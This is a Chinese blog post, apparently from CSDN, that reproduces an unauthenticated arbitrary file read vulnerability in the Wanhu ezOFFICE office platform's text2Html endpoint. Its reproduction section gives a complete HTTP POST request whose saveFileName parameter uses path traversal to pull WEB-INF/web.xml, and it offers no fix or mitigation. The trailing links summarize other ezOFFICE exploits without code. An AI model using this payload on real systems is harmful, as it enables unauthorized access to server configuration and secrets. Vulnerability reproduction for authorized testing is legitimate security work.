万户OA text2Html接口存在任意文件读取漏洞

最新推荐文章于 2024-09-03 01:45:35 发布
最新推荐文章于 2024-09-03 01:45:35 发布
阅读量695 收藏 11
点赞数 13
分类专栏: 0/1day漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39573664/article/details/134536935
版权

0x01 产品简介

EZOffice是万户网络专注于中高端市场的协同办公软件产品。通过统一的基础管理平台,实现用户数据、权限和身份的一体化管理认证。该产品整合了门户网站群和协同办公平台,将外部信息维护、客户服务、互动交流与日常工作紧密结合,从而有效提升工作效率。多年来,EZOffice一直不懈努力,致力于为用户提供高质量的协同办公解决方案。

0x02 漏洞概述

EZOffice协同管理平台的text2Htm接口存在潜在的任意文件读取漏洞,使得未经身份认证的攻击者有可能通过此漏洞获取敏感文件的访问权限

0x03 影响范围

EZOffice

0x04 复现环境

0x05 漏洞复现

POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Content-Length: 62
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
SL-CE-SUID: 1081

saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=txt

时光匆匆逝,期年如梦
关注
专栏目录
万户ezOFFICE text2Html 任意文件读取漏洞
m0_50797689的博客
01-25 283
万户ezOFFICE text2Html 任意文件读取漏洞
万户OA ezOFFICE graph_include.jsp接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 295
万户OA ezOFFICE graph_include.jsp接口存在SQL注入漏洞,未授权的攻击者可 利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现-万户OA text2Html 任意文件读取(附漏洞检测脚本)
jjjj1029056414的博客
01-27 814
漏洞复现-万户OA text2Html 任意文件读取,附带自己写的poc脚本
漏洞复现】万户-ezOFFICE DownloadServlet 任意文件下载漏洞
凝聚力安全团队
06-21 360
万户OA-ezOFFICE DownloadServlet 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
【复现】万户ezoffice协同管理平台 任意文件读取漏洞_30
fushuang333的博客
01-27 626
【复现】万户ezoffice协同管理平台 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
万户OA-text2html-任意文件读取(含批量验证poc)
weixin_43567873的博客
04-15 169
万户OA-text2html-任意文件读取(含批量验证poc)
华天动力OA downloadWpsFile.jsp 任意文件读取漏洞复现
0xSec
07-26 542
​华天动力OAdownloadWpsFile.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
漏洞复现】致远OA fileUpload.do 任意文件上传漏洞
最新发布
凝聚力安全团队
09-03 1149
致远OA fileUpload.do 接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
万户协同办公平台ezoffice text2Html接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
02-24 114
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
【1day】​万户协同办公平台 convertFile 任意文件读取漏洞学习
记录并分享学习安全的知识点..
12-09 861
万户协同办公平台是一款企业级的协同办公软件,旨在帮助企业提高工作效率和协同能力。该平台提供了多种功能模块,包括日程管理、任务管理、文档管理、邮件管理、审批流程等,支持多人协同操作和实时沟通。万户协同办公平台convertFile 文件存在任意文件读取漏洞,攻击者可以在未经授权的情况读取系统上的任意文件
万户 ezOFFICE convertFile 文件读取漏洞复现
0xSec
12-10 864
万户ezOFFICE convertFile 接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态
科荣AIO管理系统 moffice接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 155
科荣AIO管理系统moffice接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3409
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件
漏洞复现】万户OA RhinoScriptEngineService 命令执行漏洞
qq_67810151的博客
02-27 894
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。
万户OA jsp/view.jsp反射型XSS漏洞复现
afei001
01-10 432
万户OA是集协同软件、门户网站、ERP、CRM、HR、财务、电子邮件、视频会议的功能的一种综合性办公系统。该产品存在反射型XSS漏洞,攻击者可利用该漏洞HTML上下文中执行JavaScript恶意代码。
漏洞复现】万户OA-AdminService-RCE
知黑而守白
01-19 255
万户OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA存在一处远程代码执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
漏洞复现】万户OA file2Html.controller 远程文件下载漏洞(RCE)
sheep_qm的博客
01-30 668
万户OAOffice Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。
万户OA jsp/view.jsp反射型XSS漏洞分析与自动化验证脚本
afei001
01-09 354
万户OA jsp/view.jsp反射型XSS漏洞分析与自动化验证脚本。
万户oa officeserver.jsp任意文件上传漏洞复现
12-22
这是一个常见的漏洞,攻击者可以利用它上传恶意文件到服务器上,从而对系统进行攻击。首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上传漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上传恶意的文件,比如Webshell文件。 在上传过程中,攻击者可能需要绕过一些安全控制,可能需要修改请求头或使用特定的文件格式来欺骗服务器。一旦成功上传了恶意文件,攻击者就可以利用它来执行任意的命令,比如查看、修改和删除服务器上的文件,甚至获取系统权限。 为了防止这种漏洞的发生,系统管理员可以采取一些措施,比如限制上传文件的类型和大小、检查上传文件的内容、限制上传文件的访问权限等。此外,及时更新系统补丁,加强对系统的监控和日志审计也是非常重要的。对于已知的漏洞,及时修复和更新系统也是必不可少的。 总的来说,要防范万户OA officeserver.jsp任意文件上传漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修复,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值